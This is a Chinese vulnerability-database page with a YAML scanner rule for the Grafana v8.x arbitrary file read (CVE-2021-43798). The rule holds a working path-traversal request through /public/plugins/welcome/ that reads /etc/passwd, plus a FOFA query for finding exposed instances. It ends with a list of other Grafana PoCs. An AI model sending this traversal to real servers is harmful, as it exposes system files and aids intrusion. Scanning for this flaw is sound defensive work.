grafana-file-read: Grafana v8.x Arbitrary File Read

漏洞描述

PoC代码[已公开]

id: grafana-file-read

info:
  name: Grafana v8.x Arbitrary File Read
  author: zan8in
  severity: high
  description: |-
    fofa: app="Grafana_Labs-公司产品"
  tags: grafana,file-read
  created: 2023/09/18

rules:
  r0:
    request:
      method: GET
      path: /login
    expression: response.status == 200 && response.body.bcontains(b'<title>Grafana</title>')
  r1:
    request:
      method: GET
      path: /public/plugins/welcome/../../../../../../../../../../../../../../../../../../../etc/passwd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0() && r1()

相关漏洞推荐

• Grafana存在重定向漏洞(CVE-2025-4123)
• Grafana /avatar 服务器端请求伪造漏洞（CVE-2020-13379）
• POC CVE-2019-15043: Grafana - Improper Access Control
• POC CVE-2020-11110: Grafana <= 6.7.1 - Cross-Site Scripting
• POC CVE-2020-13379: Grafana 3.0.1-7.0.1 - Server-Side Request Forgery
• POC CVE-2021-27358: Grafana Unauthenticated Snapshot Creation
• POC CVE-2021-39226: Grafana Snapshot - Authentication Bypass
• POC CVE-2021-41174: Grafana 8.0.0 <= v.8.2.2 - Angularjs Rendering Cross-Site Scripting
• POC CVE-2021-43798: Grafana v8.x - Arbitrary File Read
• POC CVE-2022-26148: Grafana & Zabbix Integration - Credentials Disclosure
• POC CVE-2024-9264: Grafana Post-Auth DuckDB - SQL Injection To File Read
• POC CVE-2025-3415: Grafana - Exposes DingDing API Keys
• POC CVE-2025-4123: Grafana - XSS / Open Redirect / SSRF via Client Path Traversal